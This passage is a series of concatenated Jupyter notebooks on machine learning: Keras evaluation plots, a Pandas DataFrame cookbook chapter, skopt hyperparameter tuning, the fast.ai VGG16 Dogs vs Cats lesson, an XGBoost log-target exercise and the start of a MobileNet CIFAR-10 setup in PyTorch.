rowdata[col_label]=cm[i,j]
df = pd.concat([df, pd.DataFrame.from_dict({row_label: rowdata}, orient='index')])  # DataFrame.append was removed in recent pandas
return df[labels]
df = cm2df(cm, ["Else", "Industrial", "Residential"])
print(df)
# Classification Report
print('Classification Report')
target_names = ['Else','Industrial','Residential']
classificn_report = classification_report(test_labels.argmax(axis=1), y_pred, target_names=target_names)
print(classificn_report)
# Plotting the Loss and Classification Accuracy
model.metrics_names
print(history.history.keys())
# "Accuracy"
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Model Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('classifcn.png')  # save before show(); show() clears the current figure
plt.show()
# "Loss"
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
```
# Chapter 1: Pandas Foundations
```
import pandas as pd
import numpy as np
```
## Introduction
## Dissecting the anatomy of a DataFrame
```
pd.set_option('max_columns', 4, 'max_rows', 10)
movies = pd.read_csv('../data/movie.csv')
movies.head()
```
### How it works...
## DataFrame Attributes
### How to do it... {#how-to-do-it-1}
```
movies = pd.read_csv('../data/movie.csv')
columns = movies.columns
index = movies.index
data = movies.values
columns
index
data
type(index)
type(columns)
type(data)
issubclass(pd.RangeIndex, pd.Index)
```
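The same three components can be inspected on a DataFrame built by hand, which makes their types easy to see without needing the `movie.csv` file:

```
import numpy as np
import pandas as pd

df = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
print(type(df.index))    # RangeIndex: the default row labels
print(type(df.columns))  # Index holding the column labels
print(type(df.values))   # the data itself, a NumPy ndarray
```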
### How it works...
### There's more
```
index.values
columns.values
```
## Understanding data types
### How to do it... {#how-to-do-it-2}
```
movies = pd.read_csv('data/movie.csv')
movies.dtypes
movies.get_dtype_counts()
movies.info()
```
### How it works...
```
pd.Series(['Paul', np.nan, 'George']).dtype
```
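Because that Series mixes strings with a missing value, Pandas falls back to the catch-all `object` dtype; a numeric column with missing data instead becomes `float64`, since `np.nan` is a float. A small self-contained comparison:

```
import numpy as np
import pandas as pd

mixed = pd.Series(['Paul', np.nan, 'George'])
nums = pd.Series([1, np.nan, 3])
print(mixed.dtype, nums.dtype)  # → object float64
```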
### There's more...
### See also
## Selecting a Column
### How to do it... {#how-to-do-it-3}
```
movies = pd.read_csv('data/movie.csv')
movies['director_name']
movies.director_name
movies.loc[:, 'director_name']
movies.iloc[:, 1]
movies['director_name'].index
movies['director_name'].dtype
movies['director_name'].size
movies['director_name'].name
type(movies['director_name'])
movies['director_name'].apply(type).unique()
```
### How it works...
### There's more
### See also
## Calling Series Methods
```
s_attr_methods = set(dir(pd.Series))
len(s_attr_methods)
df_attr_methods = set(dir(pd.DataFrame))
len(df_attr_methods)
len(s_attr_methods & df_attr_methods)
```
### How to do it... {#how-to-do-it-4}
```
movies = pd.read_csv('data/movie.csv')
director = movies['director_name']
fb_likes = movies['actor_1_facebook_likes']
director.dtype
fb_likes.dtype
director.head()
director.sample(n=5, random_state=42)
fb_likes.head()
director.value_counts()
fb_likes.value_counts()
director.size
director.shape
len(director)
director.unique()
director.count()
fb_likes.count()
fb_likes.quantile()
fb_likes.min()
fb_likes.max()
fb_likes.mean()
fb_likes.median()
fb_likes.std()
fb_likes.describe()
director.describe()
fb_likes.quantile(.2)
fb_likes.quantile([.1, .2, .3, .4, .5, .6, .7, .8, .9])
director.isna()
fb_likes_filled = fb_likes.fillna(0)
fb_likes_filled.count()
fb_likes_dropped = fb_likes.dropna()
fb_likes_dropped.size
```
### How it works...
### There's more...
```
director.value_counts(normalize=True)
director.hasnans
director.notna()
```
### See also
## Series Operations
```
5 + 9 # plus operator example. Adds 5 and 9
```
### How to do it... {#how-to-do-it-5}
```
movies = pd.read_csv('data/movie.csv')
imdb_score = movies['imdb_score']
imdb_score
imdb_score + 1
imdb_score * 2.5
imdb_score // 7
imdb_score > 7
director = movies['director_name']
director == 'James Cameron'
```
### How it works...
### There's more...
```
imdb_score.add(1) # imdb_score + 1
imdb_score.gt(7) # imdb_score > 7
```
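The method forms return exactly the same Series as the operators, which is what makes them drop-in replacements inside method chains. A small self-contained check:

```
import pandas as pd

s = pd.Series([5.0, 7.5, 8.0])
print(s.add(1).equals(s + 1))  # → True
print(s.gt(7).equals(s > 7))   # → True
```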
### See also
## Chaining Series Methods
### How to do it... {#how-to-do-it-6}
```
movies = pd.read_csv('data/movie.csv')
fb_likes = movies['actor_1_facebook_likes']
director = movies['director_name']
director.value_counts().head(3)
fb_likes.isna().sum()
fb_likes.dtype
(fb_likes.fillna(0)
.astype(int)
.head()
)
```
### How it works...
### There's more...
```
(fb_likes.fillna(0)
#.astype(int)
#.head()
)
(fb_likes.fillna(0)
.astype(int)
#.head()
)
fb_likes.isna().mean()
fb_likes.fillna(0) \
.astype(int) \
.head()
def debug_df(df):
print("BEFORE")
print(df)
print("AFTER")
return df
(fb_likes.fillna(0)
.pipe(debug_df)
.astype(int)
.head()
)
intermediate = None
def get_intermediate(df):
global intermediate
intermediate = df
return df
res = (fb_likes.fillna(0)
.pipe(get_intermediate)
.astype(int)
.head()
)
intermediate
```
## Renaming Column Names
### How to do it...
```
movies = pd.read_csv('data/movie.csv')
col_map = {'director_name':'Director Name',
'num_critic_for_reviews': 'Critical Reviews'}
movies.rename(columns=col_map).head()
```
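Note that `.rename` returns a new DataFrame and leaves the original untouched. A tiny frame (made up here, so it runs without the data file) makes that visible:

```
import pandas as pd

df = pd.DataFrame({'director_name': ['A'], 'num_critic_for_reviews': [10]})
renamed = df.rename(columns={'director_name': 'Director Name'})
print(list(renamed.columns))  # → ['Director Name', 'num_critic_for_reviews']
print(list(df.columns))       # original columns are unchanged
```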
### How it works... {#how-it-works-8}
### There's more {#theres-more-7}
```
idx_map = {'Avatar':'Ratava', 'Spectre': 'Ertceps',
"Pirates of the Caribbean: At World's End": 'POC'}
col_map = {'aspect_ratio': 'aspect',
"movie_facebook_likes": 'fblikes'}
(movies
.set_index('movie_title')
.rename(index=idx_map, columns=col_map)
.head(3)
)
movies = pd.read_csv('data/movie.csv', index_col='movie_title')
ids = movies.index.tolist()
columns = movies.columns.tolist()
```
Rename the row and column labels with list assignments:
```
ids[0] = 'Ratava'
ids[1] = 'POC'
ids[2] = 'Ertceps'
columns[1] = 'director'
columns[-2] = 'aspect'
columns[-1] = 'fblikes'
movies.index = ids
movies.columns = columns
movies.head(3)
def to_clean(val):
return val.strip().lower().replace(' ', '_')
movies.rename(columns=to_clean).head(3)
cols = [col.strip().lower().replace(' ', '_')
for col in movies.columns]
movies.columns = cols
movies.head(3)
```
## Creating and Deleting columns
### How to do it... {#how-to-do-it-9}
```
movies = pd.read_csv('data/movie.csv')
movies['has_seen'] = 0
idx_map = {'Avatar':'Ratava', 'Spectre': 'Ertceps',
"Pirates of the Caribbean: At World's End": 'POC'}
col_map = {'aspect_ratio': 'aspect',
"movie_facebook_likes": 'fblikes'}
(movies
.rename(index=idx_map, columns=col_map)
.assign(has_seen=0)
)
total = (movies['actor_1_facebook_likes'] +
movies['actor_2_facebook_likes'] +
movies['actor_3_facebook_likes'] +
movies['director_facebook_likes'])
total.head(5)
cols = ['actor_1_facebook_likes','actor_2_facebook_likes',
'actor_3_facebook_likes','director_facebook_likes']
sum_col = movies[cols].sum(axis='columns')
sum_col.head(5)
movies.assign(total_likes=sum_col).head(5)
def sum_likes(df):
return df[[c for c in df.columns
if 'like' in c]].sum(axis=1)
movies.assign(total_likes=sum_likes).head(5)
(movies
.assign(total_likes=sum_col)
['total_likes']
.isna()
.sum()
)
(movies
.assign(total_likes=total)
['total_likes']
.isna()
.sum()
)
(movies
.assign(total_likes=total.fillna(0))
['total_likes']
.isna()
.sum()
)
def cast_like_gt_actor_director(df):
return df['cast_total_facebook_likes'] >= \
df['total_likes']
df2 = (movies
.assign(total_likes=total,
is_cast_likes_more = cast_like_gt_actor_director)
)
df2['is_cast_likes_more'].all()
df2 = df2.drop(columns='total_likes')
actor_sum = (movies
[[c for c in movies.columns if 'actor_' in c and '_likes' in c]]
.sum(axis='columns')
)
actor_sum.head(5)
movies['cast_total_facebook_likes'] >= actor_sum
movies['cast_total_facebook_likes'].ge(actor_sum)
movies['cast_total_facebook_likes'].ge(actor_sum).all()
pct_like = (actor_sum
.div(movies['cast_total_facebook_likes'])
)
pct_like.describe()
pd.Series(pct_like.values,
index=movies['movie_title'].values).head()
```
### How it works... {#how-it-works-9}
### There's more... {#theres-more-8}
```
profit_index = movies.columns.get_loc('gross') + 1
profit_index
movies.insert(loc=profit_index,
column='profit',
value=movies['gross'] - movies['budget'])
del movies['director_name']
```
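Unlike `assign`, both `insert` and `del` mutate the frame in place. A small made-up frame shows the new column landing at the requested position:

```
import pandas as pd

df = pd.DataFrame({'title': ['A', 'B'], 'gross': [10, 7], 'budget': [4, 9]})
profit_index = df.columns.get_loc('gross') + 1
df.insert(loc=profit_index, column='profit',
          value=df['gross'] - df['budget'])  # in-place: no new frame returned
del df['title']                              # also in-place
print(list(df.columns))       # → ['gross', 'profit', 'budget']
print(df['profit'].tolist())  # → [6, -2]
```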
### See also
```
%matplotlib inline
```
# Tuning a scikit-learn estimator with `skopt`
Gilles Louppe, July 2016
Katie Malone, August 2016
Reformatted by Holger Nahrstaedt 2020
.. currentmodule:: skopt
If you are looking for a :obj:`sklearn.model_selection.GridSearchCV` replacement, check out
`sphx_glr_auto_examples_sklearn-gridsearchcv-replacement.py` instead.
## Problem statement
Tuning the hyper-parameters of a machine learning model is often carried out
using an exhaustive exploration of (a subset of) the space of all hyper-parameter
configurations (e.g., using :obj:`sklearn.model_selection.GridSearchCV`), which
often results in a very time-consuming operation.
In this notebook, we illustrate how to couple :class:`gp_minimize` with sklearn's
estimators to tune hyper-parameters using sequential model-based optimisation,
hopefully resulting in equivalent or better solutions within fewer
evaluations.
Note: scikit-optimize provides a dedicated interface for estimator tuning via
:class:`BayesSearchCV` class which has a similar interface to those of
:obj:`sklearn.model_selection.GridSearchCV`. This class uses functions of skopt to perform hyperparameter
search efficiently. For example usage of this class, see
`sphx_glr_auto_examples_sklearn-gridsearchcv-replacement.py`
example notebook.
```
print(__doc__)
import numpy as np
```
## Objective
To tune the hyper-parameters of our model we need to define a model,
decide which parameters to optimize, and define the objective function
we want to minimize.
```
from sklearn.datasets import load_boston
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.model_selection import cross_val_score
boston = load_boston()
X, y = boston.data, boston.target
n_features = X.shape[1]
# gradient boosted trees tend to do well on problems like this
reg = GradientBoostingRegressor(n_estimators=50, random_state=0)
```
Next, we need to define the bounds of the dimensions of the search space
we want to explore and pick the objective. In this case the cross-validation
mean absolute error of a gradient boosting regressor over the Boston
dataset, as a function of its hyper-parameters.
```
from skopt.space import Real, Integer
from skopt.utils import use_named_args
# The list of hyper-parameters we want to optimize. For each one we define the
# bounds, the corresponding scikit-learn parameter name, as well as how to
# sample values from that dimension (`'log-uniform'` for the learning rate)
space = [Integer(1, 5, name='max_depth'),
Real(10**-5, 10**0, "log-uniform", name='learning_rate'),
Integer(1, n_features, name='max_features'),
Integer(2, 100, name='min_samples_split'),
Integer(1, 100, name='min_samples_leaf')]
# this decorator allows your objective function to receive the parameters as
# keyword arguments. This is particularly convenient when you want to set
# scikit-learn estimator parameters
@use_named_args(space)
def objective(**params):
reg.set_params(**params)
return -np.mean(cross_val_score(reg, X, y, cv=5, n_jobs=-1,
scoring="neg_mean_absolute_error"))
```
## Optimize all the things!
With these two pieces, we are now ready for sequential model-based
optimisation. Here we use Gaussian process-based optimisation.
```
from skopt import gp_minimize
res_gp = gp_minimize(objective, space, n_calls=50, random_state=0)
print("Best score=%.4f" % res_gp.fun)
print("""Best parameters:
- max_depth=%d
- learning_rate=%.6f
- max_features=%d
- min_samples_split=%d
- min_samples_leaf=%d""" % (res_gp.x[0], res_gp.x[1],
res_gp.x[2], res_gp.x[3],
res_gp.x[4]))
```
## Convergence plot
```
from skopt.plots import plot_convergence
plot_convergence(res_gp)
```
|
github_jupyter
|
# Using Convolutional Neural Networks
Welcome to the first week of the first deep learning certificate! We're going to use convolutional neural networks (CNNs) to allow our computer to see - something that is only possible thanks to deep learning.
## Introduction to this week's task: 'Dogs vs Cats'
We're going to try to create a model to enter the [Dogs vs Cats](https://www.kaggle.com/c/dogs-vs-cats) competition at Kaggle. There are 25,000 labelled dog and cat photos available for training, and 12,500 in the test set that we have to try to label for this competition. According to the Kaggle web-site, when this competition was launched (end of 2013): *"**State of the art**: The current literature suggests machine classifiers can score above 80% accuracy on this task"*. So if we can beat 80%, then we will be at the cutting edge as of 2013!
## Basic setup
There isn't too much to do to get started - just a few simple configuration steps.
This shows plots in the web page itself - we always want to use this when using jupyter notebook:
```
%matplotlib inline
```
Define path to data: (It's a good idea to put it in a subdirectory of your notebooks folder, and then exclude that directory from git control by adding it to .gitignore.)
```
pwd
```
You need to download the data to this path...see below for the download link.
```
#path = "data/dogscats/"
# For testing code, not enough data for anything serious
path = "data/dogscats/sample/"
```
A few basic libraries that we'll need for the initial exercises:
```
from __future__ import division, print_function
import os, json
from glob import glob
import numpy as np
np.set_printoptions(precision=4, linewidth=100)
from matplotlib import pyplot as plt
```
We have created a file most imaginatively called 'utils.py' to store any little convenience functions we'll want to use. We will discuss these as we use them.
```
import utils
from utils import plots
```
# Use a pretrained VGG model with our **Vgg16** class
Our first step is simply to use a model that has been fully created for us, which can recognise a wide variety (1,000 categories) of images. We will use 'VGG', which won the 2014 Imagenet competition, and is a very simple model to create and understand. The VGG Imagenet team created both a larger, slower, slightly more accurate model (*VGG 19*) and a smaller, faster model (*VGG 16*). We will be using VGG 16 since the much slower performance of VGG19 is generally not worth the very minor improvement in accuracy.
We have created a python class, *Vgg16*, which makes using the VGG 16 model very straightforward.
## The punchline: state of the art custom model in 7 lines of code
Here's everything you need to do to get >97% accuracy on the Dogs vs Cats dataset - we won't analyze how it works behind the scenes yet, since at this stage we're just going to focus on the minimum necessary to actually do useful work.
```
# As large as you can, but no larger than 64 is recommended.
# If you have an older or cheaper GPU, you'll run out of memory, so will have to decrease this.
batch_size=32
# Import our class, and instantiate
import vgg16
import imp
imp.reload(vgg16)
from vgg16 import Vgg16
```
Download data from http://files.fast.ai/data/ (`dogscats.zip` is the relevant file for this.)
```
vgg = Vgg16()
# Grab a few images at a time for training and validation.
# NB: They must be in subdirectories named based on their category
batches = vgg.get_batches(path+'train', batch_size=batch_size)
val_batches = vgg.get_batches(path+'valid', batch_size=batch_size*2)
vgg.finetune(batches)
vgg.fit(batches, val_batches, nb_epoch=1)
```
I think the low performance compared to official lesson1 notebook is due to remaining Theano vs. Tensorflow incompatible stuff (i.e. it's not using VGG16 exactly). I propose to sidestep this by building a "new" model in Keras+TF using pretrained VGG16 now available in Keras.
The code above will work for any image recognition task, with any number of categories! All you have to do is to put your images into one folder per category, and run the code above.
Let's take a look at how this works, step by step...
## Use Vgg16 for basic image recognition
Let's start off by using the *Vgg16* class to recognise the main imagenet category for each image.
We won't be able to enter the Cats vs Dogs competition with an Imagenet model alone, since 'cat' and 'dog' are not categories in Imagenet - instead each individual breed is a separate category. However, we can use it to see how well it can recognise the images, which is a good first step.
First, create a Vgg16 object:
```
vgg = Vgg16()
```
Vgg16 is built on top of *Keras* (which we will be learning much more about shortly!), a flexible, easy to use deep learning library that sits on top of Theano or Tensorflow. Keras reads groups of images and labels in *batches*, using a fixed directory structure, where images from each category for training must be placed in a separate folder.
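As a minimal sketch of that fixed directory structure (the `data/dogscats` path follows this notebook's earlier setup; adjust it to wherever you keep the data), each category gets its own sub-folder under `train/` and `valid/`:

```shell
# Layout assumed by Keras when reading images by category:
# one sub-folder per category under each of train/ and valid/.
mkdir -p data/dogscats/train/cats data/dogscats/train/dogs
mkdir -p data/dogscats/valid/cats data/dogscats/valid/dogs
ls data/dogscats/train
```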
Let's grab batches of data from our training folder:
```
batches = vgg.get_batches(path+'train', batch_size=4)
```
(BTW, when Keras refers to 'classes', it doesn't mean python classes - but rather it refers to the categories of the labels, such as 'pug', or 'tabby'.)
*Batches* is just a regular python iterator. Each iteration returns both the images themselves, as well as the labels.
```
imgs,labels = next(batches)
```
As you can see, the labels for each image are an array, containing a 1 in the first position if it's a cat, and a 1 in the second position if it's a dog. This approach to encoding categorical variables, where the array contains a single 1 in the position corresponding to the category, is very common in deep learning. It is called *one hot encoding*.
The arrays contain two elements, because we have two categories (cat, and dog). If we had three categories (e.g. cats, dogs, and kangaroos), then the arrays would each contain two 0's, and one 1.
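A minimal sketch of one hot encoding in plain Python (the `one_hot` helper is invented here for illustration; Keras builds these arrays for you):

```python
def one_hot(index, num_classes):
    """Return a list of zeros with a single 1 at `index`."""
    v = [0] * num_classes
    v[index] = 1
    return v

print(one_hot(0, 2))  # cat -> [1, 0]
print(one_hot(1, 2))  # dog -> [0, 1]
print(one_hot(2, 3))  # third category of three -> [0, 0, 1]
```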
```
plots(imgs, titles=labels)
```
We can now pass the images to Vgg16's predict() function to get back probabilities, category indexes, and category names for each image's VGG prediction.
```
vgg.predict(imgs, True)
```
The category indexes are based on the ordering of categories used in the VGG model - e.g. here are the first four:
```
vgg.classes[:4]
```
(Note that, other than creating the Vgg16 object, none of these steps are necessary to build a model; they are just showing how to use the class to view imagenet predictions.)
## Use our Vgg16 class to finetune a Dogs vs Cats model
To change our model so that it outputs "cat" vs "dog", instead of one of 1,000 very specific categories, we need to use a process called "finetuning". Finetuning looks from the outside to be identical to normal machine learning training - we provide a training set with data and labels to learn from, and a validation set to test against. The model learns a set of parameters based on the data provided.
However, the difference is that we start with a model that is already trained to solve a similar problem. The idea is that many of the parameters should be very similar, or the same, between the existing model, and the model we wish to create. Therefore, we only select a subset of parameters to train, and leave the rest untouched. This happens automatically when we call *fit()* after calling *finetune()*.
We create our batches just like before, and make the validation set available as well. A 'batch' (or *mini-batch* as it is commonly known) is simply a subset of the training data - we use a subset at a time when training or predicting, in order to speed up training, and to avoid running out of memory.
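The mini-batch idea can be sketched in a few lines of plain Python (the `minibatches` helper is hypothetical, not part of the Vgg16 class, which streams batches from disk instead):

```python
def minibatches(data, batch_size):
    """Yield successive slices of `data`, each at most `batch_size` long."""
    for i in range(0, len(data), batch_size):
        yield data[i:i + batch_size]

samples = list(range(10))
print([len(b) for b in minibatches(samples, 4)])  # -> [4, 4, 2]
```

The last batch is simply smaller when the dataset size isn't a multiple of the batch size.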
```
batch_size=32
batches = vgg.get_batches(path+'train', batch_size=batch_size)
val_batches = vgg.get_batches(path+'valid', batch_size=batch_size)
```
Calling *finetune()* modifies the model such that it will be trained based on the data in the batches provided - in this case, to predict either 'dog' or 'cat'.
```
vgg.finetune(batches)
```
Finally, we *fit()* the parameters of the model using the training data, reporting the accuracy on the validation set after every epoch. (An *epoch* is one full pass through the training data.)
```
vgg.fit(batches, val_batches, nb_epoch=10)
```
That shows all of the steps involved in using the Vgg16 class to create an image recognition model using whatever labels you are interested in. For instance, this process could classify paintings by style, or leaves by type of disease, or satellite photos by type of crop, and so forth.
Next up, we'll dig one level deeper to see what's going on in the Vgg16 class.
# Create a VGG model from scratch in Keras
For the rest of this tutorial, we will not be using the Vgg16 class at all. Instead, we will recreate from scratch the functionality we just used. This is not necessary if all you want to do is use the existing model - but if you want to create your own models, you'll need to understand these details. It will also help you in the future when you debug any problems with your models, since you'll understand what's going on behind the scenes.
## Model setup
We need to import all the modules we'll be using from numpy, scipy, and keras:
```
from numpy.random import random, permutation
from scipy import misc, ndimage
from scipy.ndimage.interpolation import zoom
import keras
from keras import backend as K
from keras.utils.data_utils import get_file
from keras.models import Sequential, Model
from keras.layers.core import Flatten, Dense, Dropout, Lambda
from keras.layers import Input
from keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.optimizers import SGD, RMSprop
from keras.preprocessing import image
```
Let's import the mappings from VGG ids to imagenet category ids and descriptions, for display purposes later.
```
FILES_PATH = 'http://files.fast.ai/models/'; CLASS_FILE='imagenet_class_index.json'
# Keras' get_file() is a handy function that downloads files, and caches them for re-use later
fpath = get_file(CLASS_FILE, FILES_PATH+CLASS_FILE, cache_subdir='models')
with open(fpath) as f: class_dict = json.load(f)
# Convert dictionary with string indexes into an array
classes = [class_dict[str(i)][1] for i in range(len(class_dict))]
```
Here's a few examples of the categories we just imported:
```
classes[:5]
```
## Model creation
Creating the model involves creating the model architecture, and then loading the model weights into that architecture. We will start by defining the basic pieces of the VGG architecture.
VGG has just one type of convolutional block, and one type of fully connected ('dense') block. Here's the convolutional block definition:
```
def ConvBlock(layers, model, filters):
for i in range(layers):
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(filters, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
```
...and here's the fully-connected definition.
```
def FCBlock(model):
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
```
When the VGG model was trained in 2014, the creators subtracted the average of each of the three (R,G,B) channels first, so that the data for each channel had a mean of zero. Furthermore, their software expected the channels to be in B,G,R order, whereas Python by default uses R,G,B. We need to preprocess our data to make these two changes, so that it is compatible with the VGG model:
```
# Mean of each channel as provided by VGG researchers
vgg_mean = np.array([123.68, 116.779, 103.939]).reshape((3,1,1))
def vgg_preprocess(x):
x = x - vgg_mean # subtract mean
    return x[:, ::-1] # reverse channel axis rgb->bgr
```
Now we're ready to define the VGG model architecture - look at how simple it is, now that we have the basic blocks defined!
```
def VGG_16():
model = Sequential()
model.add(Lambda(vgg_preprocess, input_shape=(3,224,224)))
ConvBlock(2, model, 64)
ConvBlock(2, model, 128)
ConvBlock(3, model, 256)
ConvBlock(3, model, 512)
ConvBlock(3, model, 512)
model.add(Flatten())
FCBlock(model)
FCBlock(model)
model.add(Dense(1000, activation='softmax'))
return model
```
We'll learn about what these different blocks do later in the course. For now, it's enough to know that:
- Convolution layers are for finding patterns in images
- Dense (fully connected) layers are for combining patterns across an image
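As a sanity check on the architecture above: each ConvBlock ends in a 2x2 max-pool with stride 2, so the 224x224 input is halved five times before the Flatten layer. A quick sketch of the resulting feature-map sizes:

```python
# Each of the five ConvBlocks halves the spatial size via its 2x2 max-pool.
size = 224
sizes = [size]
for _ in range(5):
    size //= 2
    sizes.append(size)
print(sizes)               # -> [224, 112, 56, 28, 14, 7]
print(512 * size * size)   # -> 25088 values fed into the first Dense(4096) layer
```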
Now that we've defined the architecture, we can create the model like any python object:
```
model = VGG_16()
```
As well as the architecture, we need the weights that the VGG creators trained. The weights are the part of the model that is learnt from the data, whereas the architecture is pre-defined based on the nature of the problem.
Downloading pre-trained weights is much preferred to training the model ourselves, since otherwise we would have to download the entire Imagenet archive, and train the model for many days! It's very helpful when researchers release their weights, as they did here.
```
fpath = get_file('vgg16.h5', FILES_PATH+'vgg16.h5', cache_subdir='models')
model.load_weights(fpath)
```
## Getting imagenet predictions
The setup of the imagenet model is now complete, so all we have to do is grab a batch of images and call *predict()* on them.
```
batch_size = 4
```
Keras provides functionality to create batches of data from directories containing images; all we have to do is to define the size to resize the images to, what type of labels to create, whether to randomly shuffle the images, and how many images to include in each batch. We use this little wrapper to define some helpful defaults appropriate for imagenet data:
```
def get_batches(dirname, gen=image.ImageDataGenerator(), shuffle=True,
batch_size=batch_size, class_mode='categorical'):
return gen.flow_from_directory(path+dirname, target_size=(224,224),
class_mode=class_mode, shuffle=shuffle, batch_size=batch_size)
```
From here we can use exactly the same steps as before to look at predictions from the model.
```
batches = get_batches('train', batch_size=batch_size)
val_batches = get_batches('valid', batch_size=batch_size)
imgs,labels = next(batches)
# This shows the 'ground truth'
plots(imgs, titles=labels)
```
The VGG model returns 1,000 probabilities for each image, representing the probability that the model assigns to each possible imagenet category for each image. By finding the index with the largest probability (with *np.argmax()*) we can find the predicted label.
```
def pred_batch(imgs):
preds = model.predict(imgs)
idxs = np.argmax(preds, axis=1)
print('Shape: {}'.format(preds.shape))
print('First 5 classes: {}'.format(classes[:5]))
print('First 5 probabilities: {}\n'.format(preds[0, :5]))
print('Predictions prob/class: ')
for i in range(len(idxs)):
idx = idxs[i]
print (' {:.4f}/{}'.format(preds[i, idx], classes[idx]))
pred_batch(imgs)
```
|
github_jupyter
|
```
import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn import preprocessing
from sklearn.cross_validation import KFold  # sklearn.model_selection in newer scikit-learn
from sklearn.metrics import mean_absolute_error
%matplotlib inline
train = pd.read_csv('train.csv')
cat_feats = train.select_dtypes(include=["object"]).columns
for feat in cat_feats:
train[feat + '_id'] = preprocessing.LabelEncoder().fit_transform(train[feat].values)
num_feats = [feat for feat in train.columns if 'cont' in feat]
id_feats = [feat for feat in train.columns if '_id' in feat]
X = train[num_feats + id_feats].values
y = train['loss'].values
model = xgb.XGBRegressor(
max_depth = 12,
learning_rate = 0.2,
n_estimators = 20,
silent = 0,
objective = 'reg:linear',
nthread = -1,
# gamma = 5290.,
# min_child_weight = 4.2922,
subsample = 0.7,
colsample_bytree = 0.6,
seed = 2017
)
nfolds = 3
folds = KFold(len(y), n_folds=nfolds, shuffle = True, random_state = 2017)
for num_iter, (train_index, test_index) in enumerate(folds):
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
model.fit(X_train, y_train,
eval_metric='mae',
              eval_set=[(X_train, y_train), (X_test, y_test)],
verbose=True)
y_pred = model.predict(X_test)
y_pred[y_pred<0] = 0
score = mean_absolute_error(y_test, y_pred)
print("Fold{0}, score={1}".format(num_iter+1, score))
```
## Task
One cell above there's a model which uses y as the target variable.
Modify the code to train on a log-transformed target variable instead...
Some tips:
1. y_log_train = np.log(y_train)
2. model.fit(X_train, y_log_train, ...
3. y_log_pred = model.predict(X_test)
4. y_pred = np.exp(y_log_pred)
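One detail worth noting: losses can be zero, and log(0) is undefined, which is why the solution cell adds 1 before the log and subtracts 1 after the exp. Python's `math.log1p`/`math.expm1` (and the numpy equivalents `np.log1p`/`np.expm1`) implement exactly this round-trip:

```python
import math

y = 0.0                      # a zero loss: plain math.log(y) would fail
y_log = math.log1p(y)        # same as math.log(y + 1)
y_back = math.expm1(y_log)   # same as math.exp(y_log) - 1
print(y_log, y_back)         # -> 0.0 0.0

# the round-trip recovers a typical positive loss value
assert abs(math.expm1(math.log1p(1234.5)) - 1234.5) < 1e-9
```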
```
nfolds = 3
folds = KFold(len(y), n_folds=nfolds, shuffle = True, random_state = 2017)
for num_iter, (train_index, test_index) in enumerate(folds):
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
y_log_train = np.log(y_train + 1)
y_log_test = np.log(y_test + 1)
model.fit(X_train, y_log_train,
eval_metric='mae',
eval_set=[(X_train, y_log_train), (X_test, y_log_test)],
verbose=True)
y_log_pred = model.predict(X_test)
y_pred = np.exp(y_log_pred) - 1
y_pred[y_pred<0] = 0
score = mean_absolute_error(y_test, y_pred)
print("Fold{0}, score={1}".format(num_iter+1, score))
```
|
github_jupyter
|
# <center>MobileNet - Pytorch
# Step 1: Prepare data
```
# MobileNet-Pytorch
import argparse
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
from torchvision import datasets, transforms
from torch.autograd import Variable
from torch.utils.data.sampler import SubsetRandomSampler
from sklearn.metrics import accuracy_score
#from mobilenets import mobilenet
use_cuda = torch.cuda.is_available()
dtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
# Train, Validate, Test. Heavily inspired by Kevinzakka https://github.com/kevinzakka/DenseNet/blob/master/data_loader.py
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
valid_size=0.1
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
# load the dataset
train_dataset = datasets.CIFAR10(root="data", train=True,
download=True, transform=train_transform)
valid_dataset = datasets.CIFAR10(root="data", train=True,
download=True, transform=valid_transform)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train)) # 10% of the 50,000 images are used as the validation set
np.random.seed(42)
np.random.shuffle(indices) # randomly shuffle [0, 1, ..., 49999]
train_idx, valid_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx) # this one is interesting
valid_sampler = SubsetRandomSampler(valid_idx)
###################################################################################
# ------------------------- experiment with different batch sizes -----------------
###################################################################################
show_step=2 # with larger batches, use a smaller show_step
max_epoch=80 # maximum number of training epochs
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=256, sampler=train_sampler)
valid_loader = torch.utils.data.DataLoader(valid_dataset,
batch_size=256, sampler=valid_sampler)
test_transform = transforms.Compose([
transforms.ToTensor(), normalize
])
test_dataset = datasets.CIFAR10(root="data",
train=False,
download=True,transform=test_transform)
test_loader = torch.utils.data.DataLoader(test_dataset,
batch_size=256,
shuffle=True)
```
# Step 2: Model Config
```
# 32x32 input is downscaled 5 times to 1x1@1024
# From https://github.com/kuangliu/pytorch-cifar
import torch
import torch.nn as nn
import torch.nn.functional as F
class Block(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block, self).__init__()
# depthwise conv: number of groups = number of input channels
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
#self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
one_conv_kernel_size = 3
